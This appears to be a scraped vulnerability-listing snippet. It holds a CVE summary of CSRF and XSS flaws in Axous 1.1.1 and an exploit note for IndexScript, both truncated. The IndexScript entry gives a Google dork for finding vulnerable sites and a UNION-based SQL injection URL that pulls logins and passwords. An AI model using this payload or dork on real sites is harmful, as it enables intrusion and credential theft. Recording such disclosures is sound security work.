CVE-2012-2629

Multiple cross-site request forgery CSRF and cross-site scripting XSS vulnerabilities in Axous 1.1.1 and earlier allow remote attackers to hijack the authentication of administrators for requests that 1 add an administrator account via an addnew action to admin/administratorsadd.php; or 2 conduct...

indexscript-sql.txt

Site: http://indexscript.com Found By: xssvgamer Google Dork: allintext: "This site is powered by IndexScript" exploit: http://www.example.com/showcat.php?catid=-1 UNION ALL SELECT login,password FROM dirlogin / Blind SQL injection in indexscript.. Vul Code: "$sql = "select name, metatitle,...